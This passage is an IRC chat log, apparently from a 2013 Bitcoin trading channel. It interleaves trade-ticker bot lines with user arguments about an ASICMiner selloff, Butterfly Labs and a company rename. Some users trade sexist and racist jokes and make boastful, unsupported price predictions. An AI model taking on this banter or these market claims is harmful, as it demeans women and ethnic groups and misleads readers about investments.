[AM1] 5 @ 3.18 = 15.9 BTC [+] Aug 22 15:25:36 [BTCTC] [ACTIVEMINING] 10 @ 0.005409 = 0.0541 BTC [-] Aug 22 15:27:33 [HAVELOCK] [AM100] 26 @ 0.02979 = 0.7745 BTC [-] Aug 22 15:27:47 kleeck a reddit post is worth about as much as your "calling" things. Aug 22 15:28:24 [BTCTC] [LABCOIN] 4 @ 0.002251 = 0.009 BTC [-] Aug 22 15:28:39 See: https://bitcointalk.org/index.php?topic=99497.msg2984315#msg2984315 Aug 22 15:29:02 dude, get out with the posturing. Aug 22 15:29:08 random anon on btctalk is not a big player. Aug 22 15:29:16 [BTCTC] [TAT.ASICMINER] 53 @ 0.0312 = 1.6536 BTC [-] Aug 22 15:29:18 [BTCTC] [TAT.ASICMINER] 21 @ 0.0312 = 0.6552 BTC [-] Aug 22 15:29:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.0311 = 0.0622 BTC [-] Aug 22 15:29:20 "big players". heh. lots of btc. the whole selloff was 100 bitcoin. Aug 22 15:29:20 [BTCTC] [TAT.ASICMINER] 29 @ 0.0311 = 0.9019 BTC [-] Aug 22 15:29:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.03105 = 0.0621 BTC [-] Aug 22 15:29:22 what whales ? Aug 22 15:29:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.03101 BTC [-] Aug 22 15:29:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.031 = 0.31 BTC [-] Aug 22 15:29:23 [BTCTC] [TAT.ASICMINER] 4 @ 0.03072 = 0.1229 BTC [-] Aug 22 15:29:24 [BTCTC] [TAT.ASICMINER] 20 @ 0.03071 = 0.6142 BTC [-] Aug 22 15:29:25 [BTCTC] [NASTY-PT] 5 @ 0.002885 = 0.0144 BTC [-] Aug 22 15:29:55 look at that, 1% over 3 btc. Aug 22 15:30:07 [BTCTC] [DMS.MINING] 6 @ 0.003399 = 0.0204 BTC [+] Aug 22 15:31:12 [BTCTC] [DMS.MINING] 29 @ 0.003399 = 0.0986 BTC [+] Aug 22 15:34:00 [BTCTC] [TAT.VIRTUALMINE] 98 @ 0.001479 = 0.1449 BTC [+] Aug 22 15:35:07 mircea_popescu, your claims indicate a lack of information on your part. I was correct regarding the AM sell off yesterday. It's not that big of a deal. A number of other people were saying similarly at the same time. I'd like to think you can deal with this fact. Aug 22 15:35:35 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00148 = 0.0044 BTC [+] Aug 22 15:35:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.03169 = 0.1268 BTC [+] Aug 22 15:35:37 [BTCTC] [TAT.ASICMINER] 50 @ 0.03169 = 1.5845 BTC [+] Aug 22 15:35:46 loading your happenstance with nonsense and calling the lot a "fact" won't help you. Aug 22 15:36:12 the mistake here is your proceeding from the intellectually bankrupt ideology of relativism, Aug 22 15:36:12 who couldn't see that sell off coming tho? Aug 22 15:36:17 mircea_popescu, Ha. Ok. Also, good morning. :) Aug 22 15:36:32 and all on top of very deep ignorance. bitcoin is not a level field. Aug 22 15:36:36 if you been day trading AM lately, it was pretty obvious as soon as FC released that div data Aug 22 15:36:38 VanCleef, I didn't really see it coming. Aug 22 15:36:42 it has people who know what's what. i'm, one of them. you're not one of them. Aug 22 15:36:46 the dynamics of what's going on with the AM price are real Aug 22 15:36:50 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.001483 = 0.0074 BTC [+] Aug 22 15:36:51 [BTCTC] [TAT.VIRTUALMINE] 32 @ 0.001485 = 0.0475 BTC [+] Aug 22 15:36:55 this isn't some thing where the market got fooled Aug 22 15:36:57 the sooner you digest this fact, and the sooner you get rid of the relativism fallacy, the sooner you have a chance to matter. Aug 22 15:37:26 ThickAsThieves you mean generally, as in, "actual implementation, actual revenue, market trying to cope with pricing it" ? Aug 22 15:37:29 if so, i agree. Aug 22 15:37:36 right Aug 22 15:37:41 yeah, that's a fact. Aug 22 15:38:09 [BTCTC] [ASICMINER-PT] 1 @ 3.11 BTC [-] Aug 22 15:38:09 [BTCTC] [ASICMINER-PT] 1 @ 3.126 BTC [+] Aug 22 15:38:15 all mining ops have to face an ever-increasing diff Aug 22 15:38:22 whether they sell hardware or farm themselves Aug 22 15:38:24 or both Aug 22 15:38:33 the two aren't really that distinct. Aug 22 15:38:41 right Aug 22 15:38:44 selling hardware has probably a better revenue model, for surer Aug 22 15:38:50 but i guess by 5 to 105 Aug 22 15:38:51 % Aug 22 15:38:56 but AM shareholders are entertaining delusions more and more Aug 22 15:39:04 reading the main thread gets hard at times Aug 22 15:39:17 remember the 98% rule. Aug 22 15:39:20 cuz while I've not lost faith in AM Aug 22 15:39:24 98% of discussion comes from holders of 2% of float. Aug 22 15:39:26 i'm not an idiot either Aug 22 15:39:45 [BTCTC] [TAT.ASICMINER] 34 @ 0.03169 = 1.0775 BTC [+] Aug 22 15:40:06 this guy selling 1000 shares, really sold shares, and really has more to sell Aug 22 15:40:12 consider that when digesting his comments Aug 22 15:40:16 :) Aug 22 15:40:38 i think his methods were idiotic Aug 22 15:40:38 plenty of people have plenty to sell, to the tune of about 170k or so. Aug 22 15:40:44 but taht's his problem Aug 22 15:41:03 I agree, ThickAsThieves. It was a shitty play. Aug 22 15:41:18 what we found out yesterday is that those 170k or shares held by various people have about 1-2k btc TOTAL to split among themselves. Aug 22 15:41:21 that's the pot of liquidity. Aug 22 15:41:30 how much of that pot each gets depends basically on when they sell. Aug 22 15:41:39 i think that's extreme Aug 22 15:41:57 it is extreme, but about equidistantly from the center extreme as the rest of the crap Aug 22 15:42:03 trying to provide some semblance of balance. Aug 22 15:43:30 also, to be always remembered, liquidity is a fickle beast. it appears solid when not needed. take the more obvious case of a casino : if a dice site is making btc, it has investors. what if it's 50k btc under on 100k btc total played ? Aug 22 15:43:58 and other factors exacerbate that Aug 22 15:44:00 you can guess there's probably more than 1-2k btc wanting asicminer today. what if it flash dropped 90% ? Aug 22 15:44:05 like BTCT soft orders Aug 22 15:44:07 neither of these are likely. neither of these is impossible. Aug 22 15:44:22 ThickAsThieves if you recall, i explained when they introduiced it why it's a bad idea. Aug 22 15:44:31 and the sort of problem it will cause. Aug 22 15:44:36 yep Aug 22 15:44:36 but hey, teh ppl know better. Aug 22 15:44:52 not like ignorance should defer to experience or anything. kleeck called it! Aug 22 15:45:19 mircea_popescu, god forbid. Aug 22 15:45:34 what up tat Aug 22 15:45:43 what up Aug 22 15:46:10 had a very productive time in NYC, now i get have a few frantic days of catch-up Aug 22 15:46:15 lawyer meeting went great Aug 22 15:46:24 all kinds of new exciting things for TATI Aug 22 15:46:32 Nice! Aug 22 15:47:02 sweet Aug 22 15:47:16 i'm here for you Aug 22 15:48:30 the task at hand is the name Aug 22 15:48:34 [BTCTC] [DMS.MINING] 1 @ 0.003399 BTC [+] Aug 22 15:48:39 and whether to keep it, bacronym it, or what Aug 22 15:48:48 [BTCTC] [DMS.MINING] 100 @ 0.003399 = 0.3399 BTC [+] Aug 22 15:48:55 ahh yeh, i hate that part Aug 22 15:48:57 you need to forget about the entire thieves thing. Aug 22 15:49:12 make a fucking name for yourself. jokes are good for as long as you wear short pants. Aug 22 15:49:19 right Aug 22 15:50:05 I have some ideas already, unfortunately we dont have jewish/german/whitey last names Aug 22 15:50:17 you can change your name for the cost of a sworn affidavit. Aug 22 15:50:19 so still a boardmember tat? Aug 22 15:50:26 yes Aug 22 15:50:27 what's your last name ? Aug 22 15:50:38 pm'd Aug 22 15:50:56 i just reading up what you were saying about am before Aug 22 15:51:01 so shamu is legit? Aug 22 15:51:34 what's legit is people are selling more AM than they were a week ago Aug 22 15:51:48 oh, yeah, no big deal Aug 22 15:53:52 [BTCTC] [LABCOIN] 11 @ 0.002237 = 0.0246 BTC [-] Aug 22 15:54:10 [BTCTC] [BFMINES] 97 @ 0.001101 = 0.1068 BTC [-] Aug 22 15:54:12 [BTCTC] [BFMINES] 279 @ 0.0011 = 0.3069 BTC [-] Aug 22 15:54:13 [BTCTC] [BFMINES] 39 @ 0.0011 = 0.0429 BTC [-] Aug 22 15:54:35 So I'm pretty sure I wasted money on xchat Aug 22 15:54:55 Laziness caught the best of me Aug 22 15:56:57 how do you waste money on xchat ? Aug 22 15:57:36 I actually paid for it, but didn't realize HexChat was the same thing but for free. Aug 22 15:58:06 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002547 = 0.0255 BTC [+] Aug 22 15:58:07 [BTCTC] [TAT.MINIGAME] 5 @ 0.0002547 = 0.0013 BTC [+] Aug 22 15:58:08 [BTCTC] [TAT.MINIGAME] 5 @ 0.0002557 = 0.0013 BTC [+] Aug 22 15:58:10 [BTCTC] [TAT.MINIGAME] 20 @ 0.0002557 = 0.0051 BTC [+] Aug 22 15:58:11 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002578 BTC [+] Aug 22 15:58:12 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002589 BTC [+] Aug 22 15:58:13 [BTCTC] [TAT.MINIGAME] 494 @ 0.00026 = 0.1284 BTC [+] Aug 22 15:58:14 [BTCTC] [TAT.MINIGAME] 50 @ 0.000267 = 0.0134 BTC [+] Aug 22 15:58:14 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002719 = 0.0272 BTC [+] Aug 22 15:58:15 [BTCTC] [TAT.MINIGAME] 1000 @ 0.000288 = 0.288 BTC [+] Aug 22 15:58:18 so you gave some developers some dough. Aug 22 15:58:28 i could think of alternative uses more wasteful. Aug 22 15:58:39 Yeah I know it not exactly a bad thing in the end Aug 22 15:58:43 yea Aug 22 15:58:53 I'm kind of a penny pincher at the same time Aug 22 15:59:07 pinch nipples instead. better for all involved. Aug 22 15:59:17 http://i.imgur.com/A5QTuzD.jpg Aug 22 15:59:18 I can't argue with that logic Aug 22 16:00:48 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002879 = 0.0288 BTC [-] Aug 22 16:00:49 [BTCTC] [TAT.MINIGAME] 2941 @ 0.0002889 = 0.8497 BTC [+] Aug 22 16:01:10 flawless yahweh logic Aug 22 16:01:40 [HAVELOCK] [XBOND] 70 @ 0.00114499 = 0.0801 BTC [+] Aug 22 16:01:46 [HAVELOCK] [AM100] 4 @ 0.0299 = 0.1196 BTC [+] Aug 22 16:02:06 lol Aug 22 16:02:10 [BTCTC] [KENILWORTH] 62 @ 0.001794 = 0.1112 BTC [-] Aug 22 16:02:26 [HAVELOCK] [XBOND] 6 @ 0.00114499 = 0.0069 BTC [+] Aug 22 16:02:58 [BTCTC] [KENILWORTH] 232 @ 0.001795 = 0.4164 BTC [+] Aug 22 16:03:35 ;;bc,convert shekels Aug 22 16:03:36 1 BTC = 122.78568 U.S. dollars = 440.271939 Israeli shekels Aug 22 16:03:41 [BTCTC] [KENILWORTH] 973 @ 0.001797 = 1.7485 BTC [+] Aug 22 16:03:41 cheap wifes?! Aug 22 16:03:45 FFS. Do people really need to be told not to buy from BFL? Aug 22 16:04:05 Are people actually buying the new card? Aug 22 16:04:44 When I first read, I was semi excited about it then my brain told me it's bfl you dumbfuck. Aug 22 16:04:51 Oh, I'm sure they're "pre ordering" it. I'm speaking more to all of the PSAs Aug 22 16:05:17 Posts everyhwere. "GUIZ BFL IS BAD NO BUY K?" Aug 22 16:05:22 I bet some ipo starts up with the intentions of a group buy Aug 22 16:05:31 lol Aug 22 16:05:54 Finally made a claim with my bank yesterday, we'll see how that goes. Aug 22 16:06:07 I saw a forum conv somewhere where inaba is basically telling everyone monarch is already delayed Aug 22 16:06:14 lol Aug 22 16:06:16 Yup. Aug 22 16:06:18 ;;ud inaba Aug 22 16:06:19 http://www.urbandictionary.com/define.php?term=inaba | "inaba" someone who doesn't have a clue about what s/he is talking about, coming from 'inable', 'inability' use their brains before doing something... Aug 22 16:06:21 Urban Dictionary: inaba Aug 22 16:06:22 And they won't update the site. Aug 22 16:06:27 To reflect that. Aug 22 16:06:32 yep Aug 22 16:06:39 https://forums.butterflylabs.com/monarch-discussion/4420-what-monarch-group-order.html#post53319 Aug 22 16:06:42 What is a monarch "group order" Aug 22 16:06:56 ok kakobrekla that's win. Aug 22 16:06:57 They should just start up another asic company, different name and all. Would have better luck that way Aug 22 16:06:58 [HAVELOCK] [XBOND] 9 @ 0.00114499 = 0.0103 BTC [+] Aug 22 16:07:15 kakobrekla, pure gold. Aug 22 16:07:19 Rulother they will. Aug 22 16:07:20 thank you thank you Aug 22 16:07:32 in 2014, once the bitcoin foundation approves the new bfl protocol. Aug 22 16:07:35 thow you panties on the stage now Aug 22 16:07:37 throw Aug 22 16:09:12 good girls don't wear panties. Aug 22 16:09:20 ^ Aug 22 16:09:24 ^ Aug 22 16:09:30 ^ Aug 22 16:09:34 < Aug 22 16:09:39 combo breaker Aug 22 16:09:40 +kb Aug 22 16:09:46 http://171.67.24.121/tobacco_web/images/tobacco_ads/targeting_women/womens_lib/large/lib_14.jpg Aug 22 16:10:03 Sounds like a risky click for work Aug 22 16:10:16 its work safe Aug 22 16:10:17 I fear no link. Aug 22 16:10:18 uncharacteristically. Aug 22 16:10:35 I'm also the SysAdmin. Aug 22 16:10:38 You've come a long way baby Aug 22 16:12:30 i'd have went with "sugar" rather than "baby" Aug 22 16:12:31 but hey. Aug 22 16:12:52 Depends on what demographic you're speaking to Aug 22 16:13:57 i think sugar is universally more dismissive than baby Aug 22 16:14:05 [BTCTC] [TAT.ASICMINER] 15 @ 0.03092 = 0.4638 BTC [-] Aug 22 16:14:06 [BTCTC] [TAT.ASICMINER] 7 @ 0.03092 = 0.2164 BTC [-] Aug 22 16:14:31 What about "honey" I hate "honey"... Aug 22 16:14:42 sugar or honey. hm. Aug 22 16:14:59 honey is more women to men i think. Aug 22 16:15:04 depends if coffee or tea Aug 22 16:15:05 really Aug 22 16:15:09 lol Aug 22 16:15:14 hah Aug 22 16:15:54 sugamama Aug 22 16:16:13 .d Aug 22 16:16:14 50810339.04828 | Next Diff in 407 blocks | Estimated Change: 27.0608% in 2d 1h 24m 42s Aug 22 16:16:15 let's not spoil our perfectly good sexism with racist overtones plz. Aug 22 16:16:35 gotta keep the offensive structured. Aug 22 16:18:51 [BTCTC] [LABCOIN] 1 @ 0.002227 BTC [-] Aug 22 16:20:51 So Ken from ActMining started posting in the labcoin forum to defend Actmining lol Aug 22 16:21:26 Did he post more? I thought he just scolded VE for claiming things he shouldn't. Aug 22 16:22:04 There's that and him going about the process of how information will come forth Aug 22 16:22:29 any information actually came forth so far ? Aug 22 16:25:49 I'm just thinking he shouldn't worry about having to go into other forums, and nothing besides a hint of news on monday Aug 22 16:27:00 I thought the intention was to stop VE from spreading information that he shouldn't have (and may not actually have...) Aug 22 16:28:17 the right course of action would have been to just leave the trolls alone. "don't feed the trolls" Aug 22 16:28:23 ^ Aug 22 16:28:31 [BTCTC] [BTC-BOND] 89 @ 0.009999 = 0.8899 BTC [+] Aug 22 16:28:31 It would of been more professional that way Aug 22 16:29:24 I actually sold my icedrill shares because of the antics of icebreaker (or whatever that guy's name is). just didn't like the unprofessionalism. Aug 22 16:29:38 Exactly Aug 22 16:29:42 [BTCTC] [BASIC-MINING] 2 @ 0.267 = 0.534 BTC [+] Aug 22 16:29:53 passion is one thing. trash talking other securities in their own threads another. Aug 22 16:29:54 icebreaker doesnt represent icedrill Aug 22 16:29:57 afaik Aug 22 16:30:01 [BTCTC] [ASICMINER-PT] 1 @ 3.126 BTC [+] Aug 22 16:30:01 it's DT's thing Aug 22 16:30:12 ... Aug 22 16:30:18 well don't I feel sheepish Aug 22 16:30:26 Urushiol i thought dead terra ran icething ? Aug 22 16:30:40 for some reason I thought he was part of it. Aug 22 16:30:44 cause name ?! Aug 22 16:30:44 idiot right here Aug 22 16:30:48 hehe Aug 22 16:30:49 [HAVELOCK] [LABCO] 500 @ 0.00226 = 1.13 BTC [+] Aug 22 16:30:49 lol Aug 22 16:30:51 I agree about ignoring trolls, but VE represents a large holding in ActM. I'm not saying he should have interjected, but I can understand the move a bit. Aug 22 16:31:01 i wonder if any troll registered asicminer yet on the forum Aug 22 16:31:03 VE is a turd through and through Aug 22 16:31:10 Ken should of sent someone to talk to VE instead Aug 22 16:31:11 or PM Aug 22 16:31:12 put him on ignore and move on Aug 22 16:31:14 well at least I made a profit Aug 22 16:31:24 [BTCTC] [DMS.PURCHASE] 10 @ 0.02061 = 0.2061 BTC [+] Aug 22 16:31:56 this is why I keep you guys around - to keep me in check. Aug 22 16:31:57 I think the other side of it was the Gerald seems to be involved. Aug 22 16:32:32 every time I see "VE" I think Value Engineering Aug 22 16:33:01 [BTCTC] [TAT.ASICMINER] 50 @ 0.03058 = 1.529 BTC [-] Aug 22 16:33:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.03058 = 0.0612 BTC [-] Aug 22 16:33:04 [BTCTC] [TAT.ASICMINER] 10 @ 0.03057 = 0.3057 BTC [-] Aug 22 16:33:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.03055 BTC [-] Aug 22 16:33:05 i assume you mean that volcanic erupter guy Aug 22 16:33:05 [BTCTC] [TAT.ASICMINER] 7 @ 0.03037 = 0.2126 BTC [-] Aug 22 16:33:06 i think someone's about to misspell vagina Aug 22 16:33:19 VE reminds me of Voodoo Extreme Aug 22 16:33:53 [BTCTC] [DMS.MINING] 50 @ 0.003398 = 0.1699 BTC [-] Aug 22 16:34:06 ThickAsThieves, correct. Aug 22 16:34:44 [HAVELOCK] [AM100] 15 @ 0.0299 = 0.4485 BTC [+] Aug 22 16:34:56 [BTCTC] [TAT.ASICMINER] 7 @ 0.03099 = 0.2169 BTC [+] Aug 22 16:35:32 [BTCTC] [TAT.ASICMINER] 16 @ 0.03038 = 0.4861 BTC [-] Aug 22 16:36:34 [BTCTC] [DMS.MINING] 1 @ 0.00331 BTC [-] Aug 22 16:36:35 [BTCTC] [DMS.MINING] 117 @ 0.0033 = 0.3861 BTC [-] Aug 22 16:36:37 [BTCTC] [DMS.MINING] 277 @ 0.0033 = 0.9141 BTC [-] Aug 22 16:39:11 ;;nethash Aug 22 16:39:11 513734.567972 Aug 22 16:41:10 [BTCTC] [DMS.MINING] 50 @ 0.003298 = 0.1649 BTC [-] Aug 22 16:43:00 http://www.testosteronepit.com/home/2013/8/21/leaked-german-government-warns-key-entities-not-to-use-windo.html Aug 22 16:43:23 Ha. Aug 22 16:43:45 [BTCTC] [TAT.ASICMINER] 67 @ 0.03039 = 2.0361 BTC [+] Aug 22 16:43:47 [BTCTC] [TAT.ASICMINER] 4 @ 0.03037 = 0.1215 BTC [-] Aug 22 16:43:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.03011 BTC [-] Aug 22 16:43:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.03011 = 0.0903 BTC [-] Aug 22 16:43:49 [BTCTC] [TAT.ASICMINER] 5 @ 0.0301 = 0.1505 BTC [-] Aug 22 16:43:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0301 BTC [-] Aug 22 16:43:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.0301 = 0.301 BTC [-] Aug 22 16:43:53 [BTCTC] [TAT.ASICMINER] 10 @ 0.03008 = 0.3008 BTC [-] Aug 22 16:43:54 [BTCTC] [TAT.ASICMINER] 48 @ 0.03007 = 1.4434 BTC [-] Aug 22 16:43:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.03006 = 0.0601 BTC [-] Aug 22 16:43:56 [BTCTC] [TAT.ASICMINER] 11 @ 0.03001 = 0.3301 BTC [-] Aug 22 16:43:57 [BTCTC] [TAT.ASICMINER] 14 @ 0.03 = 0.42 BTC [-] Aug 22 16:43:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.03 = 0.06 BTC [-] Aug 22 16:43:59 [BTCTC] [TAT.ASICMINER] 12 @ 0.03 = 0.36 BTC [-] Aug 22 16:44:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.03 BTC [-] Aug 22 16:44:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.03 = 0.06 BTC [-] Aug 22 16:44:02 [BTCTC] [TAT.ASICMINER] 20 @ 0.03 = 0.6 BTC [-] Aug 22 16:44:03 [BTCTC] [TAT.ASICMINER] 4 @ 0.03 = 0.12 BTC [-] Aug 22 16:44:03 hmm Aug 22 16:44:04 [BTCTC] [TAT.ASICMINER] 49 @ 0.03 = 1.47 BTC [-] Aug 22 16:45:09 [BTCTC] [TAT.ASICMINER] 4 @ 0.02912 = 0.1165 BTC [-] Aug 22 16:45:43 [BTCTC] [LABCOIN] 3 @ 0.0022 = 0.0066 BTC [-] Aug 22 16:45:43 was it berlin who switched to all govt computers to linux a few years back and a few years later figured out its not gonna work and went back to ms Aug 22 16:45:44 [BTCTC] [LABCOIN] 1 @ 0.0022 BTC [-] Aug 22 16:46:39 Not going to work!? Aug 22 16:49:11 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002532 BTC [-] Aug 22 16:49:49 [BTCTC] [ACTIVEMINING] 6 @ 0.005294 = 0.0318 BTC [-] Aug 22 16:49:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.03101 BTC [+] Aug 22 16:50:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.031 BTC [-] Aug 22 16:50:33 solitaire doesn't run on linux without wine Aug 22 16:50:57 facebook seems to work though Aug 22 16:51:35 Do you know why MS included solitaire in windows? Aug 22 16:51:45 by govt request? Aug 22 16:51:59 Just some trivial info :P - To get people used to the concept of click and drag Aug 22 16:52:47 [BTCTC] [BFMINES] 103 @ 0.001102 = 0.1135 BTC [+] Aug 22 16:53:06 [BTCTC] [BTC-TRADING-PT] 1 @ 0.85 BTC [-] Aug 22 16:53:24 [BTCTC] [DMS.MINING] 157 @ 0.003252 = 0.5106 BTC [-] Aug 22 16:53:25 [BTCTC] [DMS.MINING] 88 @ 0.003252 = 0.2862 BTC [-] Aug 22 16:53:27 [BTCTC] [DMS.MINING] 233 @ 0.003251 = 0.7575 BTC [-] Aug 22 16:53:46 Waiting for the day I go to trivia and get asked that question, meaning never. Aug 22 16:53:47 [BTCTC] [BTC-TRADING-PT] 1 @ 0.811 BTC [-] Aug 22 16:54:20 http://www.theverge.com/2013/8/22/4646796/yahoo-is-number-one-in-web-traffic-for-the-first-time-since-2011-says-comscore Aug 22 16:54:24 Yahoo is number one in web traffic for the first time since 2011, says ComScore | The Verge Aug 22 16:54:41 say what Aug 22 16:56:57 [BTCTC] [DMS.MINING] 8 @ 0.003298 = 0.0264 BTC [+] Aug 22 16:57:31 [BTCTC] [ASICMINER-PT] 1 @ 3.125 BTC [-] Aug 22 16:57:33 [BTCTC] [ASICMINER-PT] 4 @ 3.129 = 12.516 BTC [+] Aug 22 16:58:30 [BTCTC] [TAT.ASICMINER] 4 @ 0.03078 = 0.1231 BTC [-] Aug 22 16:58:30 "A peer voted YES on your asset: TAT.ASICMINER" Aug 22 16:58:31 [BTCTC] [TAT.ASICMINER] 3 @ 0.03079 = 0.0924 BTC [+] Aug 22 16:58:40 perpetual voiting makes no sense to me Aug 22 16:58:41 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001485 = 0.003 BTC [+] Aug 22 16:58:46 voting* Aug 22 16:58:50 (on BTCT) Aug 22 16:59:50 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002867 BTC [+] Aug 22 16:59:52 ThickAsThieves so if i buy X seats i could take your asset offline ? Aug 22 17:00:15 [BTCTC] [ASICMINER-PT] 1 @ 3.086 BTC [-] Aug 22 17:00:17 [BTCTC] [ASICMINER-PT] 1 @ 3.085 BTC [-] Aug 22 17:01:14 I think it works so that it's active once you get 5 yes votes, regardless of number of no votes Aug 22 17:01:17 [BTCTC] [LABCOIN] 2 @ 0.002227 = 0.0045 BTC [+] Aug 22 17:01:18 [BTCTC] [LABCOIN] 20 @ 0.002228 = 0.0446 BTC [+] Aug 22 17:01:19 [BTCTC] [ASICMINER-PT] 1 @ 3.084 BTC [-] Aug 22 17:01:21 [BTCTC] [LABCOIN] 6 @ 0.002231 = 0.0134 BTC [+] Aug 22 17:01:22 [BTCTC] [LABCOIN] 50 @ 0.002232 = 0.1116 BTC [+] Aug 22 17:01:23 [BTCTC] [ASICMINER-PT] 1 @ 3.083 BTC [-] Aug 22 17:01:24 [BTCTC] [LABCOIN] 11 @ 0.002251 = 0.0248 BTC [+] Aug 22 17:01:25 [BTCTC] [ASICMINER-PT] 1 @ 3.08 BTC [-] Aug 22 17:01:25 [BTCTC] [LABCOIN] 31 @ 0.002252 = 0.0698 BTC [+] Aug 22 17:08:20 ah Aug 22 17:08:26 so if the magic five sell their shares ?! Aug 22 17:09:17 mp go back to bed Aug 22 17:09:25 i just had this under control Aug 22 17:09:32 and the you woke up :) Aug 22 17:10:06 j/k man :p Aug 22 17:10:58 but seriously Aug 22 17:11:13 AM will explode to 3.4 Aug 22 17:11:22 lc will tank to 1.9 Aug 22 17:11:35 and actm will stay at 5 Aug 22 17:11:45 kay? Aug 22 17:12:25 otherwise, i will be forced to call the prime ministers of the western world Aug 22 17:12:41 and warn them about the impending civil war Aug 22 17:13:11 [BTCTC] [DMS.MINING] 100 @ 0.003298 = 0.3298 BTC [+] Aug 22 17:13:48 [BTCTC] [DMS.MINING] 200 @ 0.003298 = 0.6596 BTC [+] Aug 22 17:13:48 lolk Aug 22 17:13:55 :D Aug 22 17:14:04 you watch some odd movies mp Aug 22 17:14:15 [BTCTC] [LABCOIN] 7 @ 0.002251 = 0.0158 BTC [-] Aug 22 17:14:16 [BTCTC] [LABCOIN] 59 @ 0.002252 = 0.1329 BTC [+] Aug 22 17:14:17 [BTCTC] [LABCOIN] 45 @ 0.002263 = 0.1018 BTC [+] Aug 22 17:14:18 [BTCTC] [LABCOIN] 1 @ 0.002264 BTC [+] Aug 22 17:14:19 [BTCTC] [LABCOIN] 166 @ 0.002265 = 0.376 BTC [+] Aug 22 17:14:20 [BTCTC] [LABCOIN] 200 @ 0.002265 = 0.453 BTC [+] Aug 22 17:14:21 [BTCTC] [LABCOIN] 62 @ 0.002266 = 0.1405 BTC [+] Aug 22 17:14:22 [BTCTC] [LABCOIN] 500 @ 0.002267 = 1.1335 BTC [+] Aug 22 17:14:24 [BTCTC] [LABCOIN] 1809 @ 0.002268 = 4.1028 BTC [+] Aug 22 17:14:25 [BTCTC] [LABCOIN] 3151 @ 0.002269 = 7.1496 BTC [+] Aug 22 17:15:14 [BTCTC] [NASTY-PT] 1 @ 0.002898 BTC [+] Aug 22 17:15:48 [BTCTC] [DMS.MINING] 296 @ 0.003298 = 0.9762 BTC [+] Aug 22 17:15:52 VanCleef ya, kind of famous for it. Aug 22 17:16:27 heh cool, didn't realise you reviewed films on your site too Aug 22 17:16:34 blog Aug 22 17:16:45 he watches europen film award movies.. Aug 22 17:16:59 which is a sign of a sick mind.. Aug 22 17:17:03 anyways.. nite Aug 22 17:17:23 could not sleep last night so at 9 am i decided to get drunk Aug 22 17:18:01 [BTCTC] [DMS.MINING] 100 @ 0.003298 = 0.3298 BTC [+] Aug 22 17:18:03 [BTCTC] [ACTIVEMINING] 20 @ 0.005291 = 0.1058 BTC [-] Aug 22 17:18:09 i watch alot of john woo Aug 22 17:18:09 it's now 5 pm and still getting drunker.. but atleast it's better than watching the socialist states of europe collapse in realtime Aug 22 17:18:18 nite peeps. Aug 22 17:18:20 [BTCTC] [ACTIVEMINING] 17 @ 0.00529 = 0.0899 BTC [-] Aug 22 17:18:44 [BTCTC] [ACTIVEMINING] 68 @ 0.005252 = 0.3571 BTC [-] Aug 22 17:18:47 lol Aug 22 17:18:49 nite Aug 22 17:19:08 [BTCTC] [ACTIVEMINING] 150 @ 0.005251 = 0.7877 BTC [-] Aug 22 17:19:26 [BTCTC] [ACTIVEMINING] 750 @ 0.00525 = 3.9375 BTC [-] Aug 22 17:19:31 this guy's been on a beder for days now. Aug 22 17:19:34 i wonder how long h lasts. Aug 22 17:19:44 [BTCTC] [ACTIVEMINING] 62 @ 0.005202 = 0.3225 BTC [-] Aug 22 17:19:53 [BTCTC] [LABCOIN] 40 @ 0.00224 = 0.0896 BTC [-] Aug 22 17:20:19 [BTCTC] [DMS.MINING] 300 @ 0.003298 = 0.9894 BTC [+] Aug 22 17:20:20 [BTCTC] [ACTIVEMINING] 59 @ 0.005201 = 0.3069 BTC [-] Aug 22 17:20:21 [HAVELOCK] [XBOND] 100 @ 0.00114499 = 0.1145 BTC [+] Aug 22 17:20:35 much longer than you think baby Aug 22 17:20:41 much longer. D Aug 22 17:20:47 [BTCTC] [ACTIVEMINING] 74 @ 0.005201 = 0.3849 BTC [-] Aug 22 17:20:48 its sugar. Aug 22 17:20:48 [BTCTC] [ACTIVEMINING] 222 @ 0.0052 = 1.1544 BTC [-] Aug 22 17:21:14 [BTCTC] [ACTIVEMINING] 74 @ 0.0052 = 0.3848 BTC [-] Aug 22 17:21:15 [BTCTC] [ACTIVEMINING] 105 @ 0.005167 = 0.5425 BTC [-] Aug 22 17:21:17 [BTCTC] [ACTIVEMINING] 421 @ 0.005166 = 2.1749 BTC [-] Aug 22 17:21:19 or honey Aug 22 17:21:27 [BTCTC] [DMS.PURCHASE] 666 @ 0.02061 = 13.7263 BTC [+] Aug 22 17:21:40 you put honey in your coffee? Aug 22 17:21:45 [BTCTC] [ACTIVEMINING] 278 @ 0.005155 = 1.4331 BTC [-] Aug 22 17:21:51 I actually drink mine black Aug 22 17:22:04 black with honey Aug 22 17:22:07 racist Aug 22 17:22:11 lol Aug 22 17:22:27 i only do cheap nobrand instant Aug 22 17:22:34 nasty Aug 22 17:22:40 cheap nobrand instant is made out of dead indian baby girls Aug 22 17:22:45 because i need my coffe in seconds, not minutes Aug 22 17:23:04 So that's the thing, I come to work and it's magically already there for me Aug 22 17:23:06 [BTCTC] [ASICMINER-PT] 1 @ 3.127 BTC [+] Aug 